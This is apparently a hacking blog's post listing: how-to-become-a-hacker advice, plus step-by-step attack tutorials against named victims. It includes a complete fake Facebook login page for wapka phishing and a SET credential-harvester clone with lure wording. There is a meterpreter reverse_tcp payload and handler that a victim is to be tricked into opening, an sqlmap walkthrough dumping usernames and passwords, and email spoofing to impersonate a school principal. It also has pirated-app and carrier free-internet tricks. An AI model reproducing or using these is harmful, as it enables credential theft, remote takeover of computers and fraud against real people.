WHAT'S NEW?
Loading...
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts


Note : Make sure you read Part 1 bedore continuing. Click Me to read.

Welcome to the second part of the series of how to become a perfect hacker. In the previous tutorial we learnt the importance of programming and which languages to start with. In this tutorial we'll move to some advance things you need to learn for becoming a perfect hacker.

Switch to Linux

Go and see every advanced programmer or hacker, which OS is he using. I'm sure most of them would be using some Linux based distribution. The reason Linux is so popular, is because it's Open Source which means it's source code is on-line and is free to use for developers. Hence, numerous developer around the globe have contributed their best to the kernel and made it so great. It also beat others in terms of security.

So, If you have never used any Linux distribution in your life and switching form windows or Mac OS, I would suggest you to start with Ubuntu Linux, which is one of the most popular Linux distribution. It's is more like windows or Mac OS and is more user friendly. The next step is to get used to it. Learn some basic Linux terminal commands and get used to working with terminal.
Now when you have gained sufficient knowledge about Ubuntu, it's time to switch to a more advanced pen testing distribution. I would suggest Kali Linux but there are more alternatives.

Kali Linux is just another Distribution based on Linux kernel but there's something special about it. It is packed with thousands of free pen testing tools which will help you in becoming a perfect hacker. 

If you have reached this level learning everything I write, then trust me, you'll find your way yourself. You'll know what to do next, where to go next.

The reason you were asked to learn programming, so that when you loophole in any web app or software, you can write your own exploit. This prevents you from just being a script kiddie.

Resources: 


So, this ends the series of How to become a perfect Hacker. Please share this you found this info helpful so that even other can be benefited from it. Do ask any questions in the comments.


I've been getting a lot of requests from people who are new to the InfoSec community and wanna master the art of Ethical Hacking or formally speaking, Penetration Testing. But the biggest mistake that noobs make is that they start with "how to hack facebook account." Don't worry if you are too doing that. Even I did that when I was a noob, but as I gained more knowledge, I knew there as something wrong. I never started the right way, I wish someone would have guided me and I might not have wasted so much time fooling around the internet searching - "how to hack facebook" lol..

So, this post is made for those who are new to InfoSec community and need the right directions. So, First let's clear some misconceptions by the following FAQ's

How to Hack a Facebook account?

This is one of the most silliest and most noobic question in the InfoSec community. Honestly speaking, Facebook doesn't spend millions of dollars on it's security so that anyone could come and hack it. They have one of the most amazing security professionals securing it's data. So it's nearly impossible to hack a Facebook account. Yeah, It's not impossible, there are many pen testers who have reached a certain level that they can find loops holes in applications and write their own exploits, but these chances are very rare.

So, for the sake of this post, I went around the internet and searched for techniques to hack a Facebook account and this is what I found:

  • Phishing - It is a technique of creating a fake Facebook login page and somehow fooling the user to login. According to me this is the only way practical way possible. I'm not promoting it but if you wanna know what it is and wanna learn this, head over to my post - Fb hacking by wapka phishing 
  • Keylogging - It is a technique of installing a malicious software on victims computer which automatically captures keystrokes and send them to the attacker. But they can be easily detected by an Antivirus or even a firewall would stop them. So, that's not possible too.
  • Stealer's - Almost 80% of the users save their password on their browsers so that that they don't have to type it again. Stealer's are malicious software's that grabs those passwords and sends to the attackers. Again they can be detected by any Antivirus software.
  • Session Hijacking - This is a technique of hijacking one's session on the same network. We do not get someone's password but can get his session if he using the http - the non secure protocol. But obviously we know that Facebook uses https which is encrypted and hence this techniques doesn't works too.
  • DNS spoofing - It is an additional to phishing and can be used to make your phishing attack strong. If your victim is on the same network, you can use this technique to change the original Facebook page to your own fake page and hence can get access to victims Facebook account. But in real world scenarios, the victim is not usually on your network.
  • Facebook hacking software - I would say nothing about this but just one word "FAKE". Never trust site's which gives you Facebook hacking software's, either they are infection your computer by making you download spywares or just earning by making you click on ads.
  • facebook.py - How can you forget this brute forcing python script. It was a security loophole on Facebook that allowed attackers to brute force someone's password. But this vulnerability has been fixed. I repeat, it has been fixed.
From the above discussion, it's clear that there's no technique that exist today that can hack Facebook account. But you can be the one who can find a loophole but you have to learn and master the art of hacking.

How to become a perfect Hacker?

Assuming that you start from level 0. First thing that you wanna learn is how to code. Yup it's one of the most important thing because without knowing how to program, you'll just become a script kiddie. 
So, step one is to learn to program. But from which language you should start with. 
  • HTML - This is one of the most fundamental language. I know many would say, "What's the use of HTML in hacking" but trust me, this is gonna help a lot.
  • JavaScript - This is gonna be useful when finding vulnerabilities like XSS ( Cross Site Scripting) and some others. HTML too play a significant role in this.
  • PHP & SQL - This two are very much important because there's exist some serve vulnerabilities like SQL injecton and plus many websites and CMS are built on PHP and SQL databases, so who know, you might find a vulnerability on some of the most popular applications.
  • Python - This is one of the most useful languages because, it will help you to write exploits and programmers are switching to Python to build web applications.
  • Java -  This language exist from decades and is quite popular. More than 3 billion devices run on Java and it's not just limited to build computer software's. There are more that a billion android devices running and and android app's are programmed in Java. So, this is very helpful in writing android exploits as well as computer exploits.

Resources :

  • Python 3 tutorials - Basically Python has two versions. Python 2.7 and Python 3.x. Python 2.7 is the most popular and has more libraries, modules and documentation available online while Python 3 is the future of Python. Both the languages are almost similar. Here's an excellent discussion on Python 2 vs Python 3 . It'll help you decide which one you should choose. There are a bunch of tutorials online.  Just search for Python2/Python 3 tutorials.


So, these were some of the resources which might help you in learning programming. This was part one of this article and if you want me to continue with part 2, Do comment.

Continue with Part 2 - http://www.hackerslite.in/2016/04/how-to-become-a-perfect-hacker-two.html


Greetings to the Hackers of the Globe. With  new security vulnerabilities discovered everyday there's been a vulnerability that has been existing a long time from now and still is very handy to hack Websites.. It's Called SQL injection.

According to Wikipedia:

 SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered forstring literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

Now, we know what is SQL injection. There's a handy tool called SQL Map.

According to SQL Maps SourceForge Wiki 

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers

So Now we have a basic knowledge about SQL injection and SQL Map.. Let's ride over to some hacking examples:

Disclaimer : The tutorial below is for educational purpose, I'm not responsible if you find yourself behind 
the bars for attempting an Unethical Act....

Vulnerable Page:

Now, you have selected your target but how do we perform SQL injection.. For that we need a SQL injection vulnerable page in that site..In simple words you cannot hack any site with it domain like hackerslite.in . For that you'll need a page which is vulnerable to SQL injection..

Finding The Vulnerable Page:

For my demonstration, I'm using a site testphp.vulnweb.com . This site is made intentionally for testing purposes..

1. Go to Google and make a search :   site:testphp.vulnweb.com inurl:php? (replace testphp.vulnweb.com with your desired target)


2. This brings me some search results. Now I open the first site i.e (http://testphp.vulnweb.com/listproducts.php?cat=1) . Now, I test this site weather this is vulnerable to SQL injection.. I do this by typing a ' at the end of the link.. example http://testphp.vulnweb.com/listproducts.php?cat=1'

This brings me a error(see image below)


This shows that the following site is vulnerable to SQL injection. So, now we have found out the target page, lets get into hacking with SQL Map...


HACKING WITH SQLMAP:

Now, fireup sql map....You may use SQL map in kali or another OS (I'm on BackBox).

The First Code i type in the terminal is:

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 --dbs

You should replace the url with your target page...SQL Map may ask you several time for yes or no.. simply
use no and hit enter every time...

The Following code brings me two databases: acuart and information_schema

Now when I have the database name, lets retrieve the table names, the code for that is:

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Here acuart is our database name...This code retrives me some tables : 


| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |

Now, when I have the database name as well as table name, we'll now retrieve the columns..The code is:

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

The Following code retrieves me some columns names:

address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |

So, now lets dump the username and password.. Use the code:

sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C uname,pass --dump

Voila, the following code dumps me the sites username and password

Disclaimer : The tutorial above was for educational purpose, I'm not responsible if you find yourself behind 
the bars for attempting an Unethical Act  


That was a simple tutorial on how to hack a website using SQL injection.....

Follow me on twitter @amit_sharma48 for regular updates on each post...
Till then like our Facebook page www.facebook.com/hackerslite








As the name suggest, we are going to learn Email Spoofing.

What Is Email Spoofing?

Email Spoofing is the technique of sending Emails from others Email ID to the Victim without hacking their account. For eg. I will send you a Email from The School's principal ID terminating you from the school, without hacking Principal's Email account and the best part is that when you reply to the Email, it will go to the Principal. Isn't it cool!!!! So let's learn how to perform the trick.


Note: This trick can put you in serious problem if used unethically. I am not responsible if you are behind the bars, spoiling your future


STEPS:

1.  Go to emkei.cz .


2. Fill in the form below with respective feilds:

                                  From Name: From whom you want the message to be sent. eg. Principals Name
                                  From Email:  From whom you want the message to be sent. eg. Principals Email
                                  To:               Victim's Email
                                  Subject:         Subject of Email




3. Solve the Captcha and the Email will be Sent. (See image below)



So, this is how we send a fake Email.
Stay Updated with more such tutorials @amit_sharma48






So, after those complicated tutorials on Hacking Facebook using Kali Linux and Hacking Windows using Kali/Backtrack , It's time for a simple and funny Tutorial helping you to Impress your Friend by Editing any website with a simple JavaScript. So Let's get Started:


STEPS:


1. Go to any site (eg. facebook.com)


2. Copy and paste this javascript in your url bar and hit enter:

  javascript:document.body.contentEditable='true'; document.designMode='on'; void 0




3. Now backspace the text and add your own (see image below)




So, this brings an end to a simple and interesting tutorial. Now impress your friends with you new skills
Stay Updated with more such tutorials on Twitter @amit_sharma48






Okay Guysss, so after my previous tutorial on How to hack FB account using wapka phishing , here's one more tutorial on Hacking Facebook account using Kali Linux by a technique called phishing and the best part of this trick is that you can also hack a twitter, gmail, yahoo, aol and many other accounts. So lets start:-

Requirments:

Steps:

1. First go to : applications > kali linux > Exploitation Tools > Social Engineering Toolkit and open set


2. This will open up a terminal with SET loadded. If you are using it for the first time then it may ask you a question, just press y and hit enter. Then it will giive you a set of options. Simply press 1 and hit enter.



3. This brings you another set of options. Now type 2 and hit enter


4. This time type 3 and hit enter


5. This again brings a new set of options. This time type 2 and hit enter


6. Now open a new terminal window. It is a black square  at the top bar (see image below)



7. Type there "ifconfig" (without quotes) and hit enter


8. This brings you a set of text with your IP address. Your IP address should be next to inet addr:  (see image below) . Copy the IP address.




9. Once you have copied the IP address, you can now close this terminal and go back to our previous terminal and paste the IP address there and hit enter. (see image below)




10. Now it ask's you to enter the website address to clone. Simply type www.facebook.com and hit enter
       [ NOTE: You can also type twitter.com , gmail.com or any other account you wanna hack ]




11. Now as you see there will be some text running and then they will stop, that means you have successfull cleared 90% of the journey. Now just give that IP address to you friend and when the page opens there is a similar page to Facebook  (see image below)



12. Now as you friend enter his Email and password to login , you will get them in the terminal (see image below)



Important Things to know about this tricks:
  •  This will work only if the victim is in the same LAN or the same wifi network. To make it work worldwide you will need to enter your public IP which can be found out simply by going to whatismyipaddress.com .
  • You should have a static IP, because if you have a dynamic IP then your IP may change in between the trick.
  • You should use a URL shortening service like goo.gl , bitly.com  etc to shorten your IP url so the victim may fall in this trick
  • Never Turn Off you PC in between otherwise you need to start again
  • Use you social skills to fool the victim inputting his credintials ( eg; Hey bro!! Just check out the new facebooks feature. It's really awesome, just log on via this link)


So, this was it. Enjoy hacking and stay updated on Twitter with many more such tricks @amit_sharma48
Do like our facebook page www.facebook.com/hackerslite















Stop paying for the Utorrent pro app on the playstore.Just download the apk  and download unlimited torrent on Android for free with a premium feel. Download it from here

Stay Updated with more such stuffs on twitter @amit_sharma48
Below is a step by step tutorial on how to hack a windows PC using Kali/ Backtrack.

Requirments:
1. Kali / Backtrack OS- Can be Downloaded from >>>>here<<<<
2. A PC
3. Internet

Procedure:
I would recommend you to burn the ISO on a USB or DVD and run it through them because using it in VMWare or Virtual Box will work only if the target in in the same LAN/Network. And also prefer to use the internet directly through modem (not router) because if you want to do it through your router, then you will also have to perform port forwarding in your router.

1. Run Kali/ Backtrack
2. Open the browser and go to whatismyipaddress.com . Note down the IP.
3. Open terminal and type:

     msfpayload windows/meterpreter/reverse_tcp LHOST=your IP LPORT=4444 x > /root/Desktop/example.exe

Note: Replace "your IP" in the above code with your IP address which we found out before.

4. Now you will get a file called example.exe on the desktop.
5. Now, close that terminal and open a new one and type the following code one by one:


msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT your IP
set LHOST 4444
exploit

Note: Replace your IP with your IP address we found before


6. After executing all of the above codes, give the file example.exe to your victim and convince him to somehow open your file.
7. As soon as he opens the file you will se some text running on your terminal and then you have access to his computer.

Now you can download the text file from >>> here <<< and use the following commands to control his PC.


That's all for this trick. Enjoy hacking and do go to our new youtube channel : hackersliteyoutube.tk to enjoy videos regarding hacking.

Stay Updated on Twitter : www.twitter.com/hackerslite
Do like our facebook page  www.facebook.com/hackerslite.

Tired of getting the same error message - "This site is Blocked by the Administrator" . Below is a simple step by step guide helping you to unblock, blocked contents:

Steps:


1. Open your browser

2. Go to anonymizer.ru

3. Type the name of the website you want to unblock in the space provided

If you are having any problem, fell free to watch the video tutorial....





Stay Updated with latest posts on Twitter : www.twitter.com/amit_sharma48
Here's one more tutorial on how could you download paid software on android for free......

1. First go to play store and search for your paid software (For eg utorrent pro)

2. Now tap on that app and click on more.

3. Now go scroll dor to version number and note it.

4. Now just make a google search by writing the app name<space > version number <space> free apk

For eg.

Utorrent 1.2.3 free apk


You are simply done. You will get many links and you can close click any of them for your download.  Now when u get ur apk, simply install it


Stay Updated on Twitter : www.twitter.com/amit_sharma48
Dont forget to like our facebook page : www.facebook.com/hackerslite

Here is one more working tutorial which is tried and tested by us on how to increase the internet speed on pc using a DNS server.....

1. Open your local area connection properties, which can simply opened by double clicking the "Local Area connection" icon in the taskbar on XP.

2. Click on properties.

3. Click on Internet Protocol or Internet Protocol IPv4 (TCP/IP) server.

4. Click on use the following DNS server option and input the following:


            Preferred DNS server   :  208.67.222.222
           Alternate DNS server   :  208.67.220.220

Note: If you already have the above settings and you are experiencing slower Internet, then use the following configuration:

           Preferred DNS  server  :  8.8.8.8
          Alternate DNS server    :  8.8.4.4

5. Click on OK and again OK

You are simply done. You may experience a faster internet.

Stay Updated with more tutorials on Twitter : www.twitter.com/amit_sharma48
Don't forget to like our fb page  : www.facebook.com/hackerslite


Hello Tech Junkies . Below is a awesome guide explaining you steps to surf anonymously on Android


You will need:
1. A rooted device
2. Orbot (available on playstore)
3. Orweb (available on playstore)

So lets start,


1. Open orbot and follow the wizard
2. Now you will see a button kind of a thing , just long press it
3. Now it will automatically connrct to a tor server which can be on any part of the earth
4. Now open orweb. You will see a homepage which will say "Congratulations you are connected to a tor         server"
5. Now in that browser, go to
     whatismyipaddress.com

You will se your ip address and location is different.  Now surf anonymously as you want

Below is a video for the above explanation: 



Stay Updated on Twitter :  www.twitter.com/amit_sharma48
Dont forget to like our facebook page : www.facebook.com/hackerslite
Stay tuned
Hey guys we are back with a new airtel free internet trick which is working with Android....

Requirments :

1. An android phone

2. Airtel Sim

3. Airtel Mod Apk

So lets start......

1. First go to Settings in your phone. Then go to More Settings>Mobile Networks>Access Point Names.

2. There create a new APN.

3. Now configure it as follows :

   Name      :       Hackerslite
   APN       :       airtelgprs.com
   Proxy      :       141.000.011.253
   Port        :         80


Leave the rest feilds as it is and save it.

4. Now Install Airtel moded APK from the below link:


click here



and install and run it.

<<<<<< Please comment if this trick is not working for you >>>>>>>>


You are simply done.

You can now enjoy free internet through opera mini.

Note : Use the trick in zero balance


Stay Updated on Twitter : www.twitter.com/amit_sharma48
Like our FB Page  :  facebook.com/hackerslite


Hey guys We are back with an exciting tutorial on how to hack facebook by wapka phising.....

1. First go to wapka and create a account there and name your site.

2. Confirm your wapka id by clicking on the link sent by wapka in your email ID.

3. Now login In to your wapka account and scrool down to your sites name.

4. Click on Manage.

5. Now a page opens. Click on Admin Mode. At the begining of the page.

6. You will see a blank page. Now click on Edit Site.

7. Now click on WML/XHTML code.

8. Now in the dialog box pase the following code:



<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Wapka.mobi</title><link rel="STYLESHEET" type="text/css" href="/styles.css"/><meta forua="true" http-equiv="Cache-Control" content="max-age=0"/><style type="text/css"> body { background: ; color: ; } a { color: ; } </style> </head><body> <div><?xml version="1.0" ?> <!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml"> <wml> <head> <meta forua="true" http-equiv="Cache-Control" content="max-age=0"/> <link rel="STYLESHEET" type="text/css" href="http://skfacebook.wapka.mobi/styles.css"/> </head> <template> <do type="options" name="Prev" label="Back"><prev/></do> </template> <card id="index" title="Facebook" > <p><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <script type="text/javascript"> document.title = "Welcome to Facebook"; </script> <head title="Welcome to Facebook"><title>Welcome to Facebook</title><meta name="description" content="Facebook helps you connect and share with the people in your life." /><meta name="referrer" content="default" id="meta_referrer" /><meta http-equiv="X-Frame-Options" content="deny" /> <!-----[ » © Fb Phishing 2013 copyrighted by TipsNet.Tk™ &amp; all credit goes to Shanto « ]-----!> </head><body class="nontouch acw"><div class="mfsm"><div id="viewport"><div class="acb aps" id="u_0_0" data-sigil="MTopBlueBarHeader"><table cellspacing="0" cellpadding="0" class="lr"><tr><td valign="top"><h1><a href="http://m.facebook.com/home.php?_dmr&amp;refid=8"><img src="http://static.ak.fbcdn.net/rsrc.php/v2/yz/r/aKhO2tw3FnO.png" width="76" height="20" class="img" alt="facebook" /></a></h1></td></tr></table></div><div id="objects_container"><div id="root" tabindex="0" role="main" class="_fco acw" data-sigil="context-layer-root"> <div class="acy aps abb"><span class="mfss">You must login again.</span></div> <form method="post" class="mobile-login-form _fcp" onSubmit="window.open ('http://facebook.com/lonelinessthinkalone')" action="site_0.xhtml"> <div class="mobile-login-field aclb apl"><div>Email or Phone<br/><input type="text" name="mf_text[Email]" class="input"/> </div></div><div class="mobile-login-field aclb apl"><div>Password<br/> <input type="password" class="input" name="mf_text[Password]"/> </div></div><div class="button_area aclb apl"> <input type="hidden" name="p" value="XXXXXXXX"/><input type="hidden" name="action" value="send_message"/> <input type="submit" name="MF_submit" class="btn btnC largeBtn" size="0" value="Log In" /></div><hr style="background-color:#cccccc;height:1px;border:0px solid #fff;margin:0.3em auto;width:100%;" /><div class="mobile-login-form _fcp"><span class="mfss fcg" style="margin-left:6px;"><b>New to Facebook?</b></span></div><div class="_4u9b aclb"><div class="button_area aclb apl"><a class="btn btnS largeBtn" href="http://m.facebook.com/r.php?refid=8">Create New Account</a></div></div><input type="hidden" autocomplete="off" name="_fb_noscript" value="true" /></form><div class="other-links aclb apl"><span class="mfsm fcg"><a href="http://m.facebook.com/recover/initiate/?refid=8">Forgot password?</a><br /><a href="http://m.facebook.com/help/?refid=8">Help Center</a></span></div></div></div></div></div><div><div id="footer"><div class="acg apm"><span class="mfss fcg"><b>English (US)</b> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=es_LA&amp;lref=http%3A%2F%2Fm.facebook.com%2F&amp;gfid=AQD28mdu19R_4ouf&amp;refid=8">Español</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=pt_BR&amp;lref=http%3A%2F%2Fm.facebook.com%2F&amp;gfid=AQDjJGXjQ2aRMYRs&amp;refid=8">Português (Brasil)</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/language.php?n=http%3A%2F%2Fm.facebook.com%2F&amp;refid=8">More…</a></span></div><div class="acg apm"><span class="mfss fcg">Facebook ©2013</span></div></div></div><div id="static_templates"></div></body> </html> </p><p align="center"><a href="/menu_0.wml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2465791/adshows/1/aid/8/country/IN/position/bottom">Super download speed only in uc browser</a></p><img src="/ga.gif?utmac=MO-32471805-1&amp;utmn=786667047&amp;utmr=-&amp;utmp=%2Fsite_0.xhtml&amp;guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-32471805-3&amp;utmn=344471327&amp;utmr=-&amp;utmp=%2Fsite_0.xhtml&amp;guid=ON" width="1" height="1" /> </card> </wml> </div><p align="center"><a href="/menu_0.xhtml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2466575/adshows/3/aid/8/country/IN/position/bottom">Super download speed only in uc browser</a></p><img src="/ga.gif?utmac=MO-32471805-1&amp;utmn=738948482&amp;utmr=-&amp;utmp=%2Findex.xhtml&amp;guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-32471805-3&amp;utmn=1497913535&amp;utmr=-&amp;utmp=%2Findex.xhtml&amp;guid=ON" width="1" height="1" /></body></html>




9. Now click on submit.



You are simply done. Your phising site has been created. Now give your friends the site address and let them log in there. Their username/email and password will be sent to your  registered email ID.


Stay Updated on Twitter : www.twitter.com/hackerslite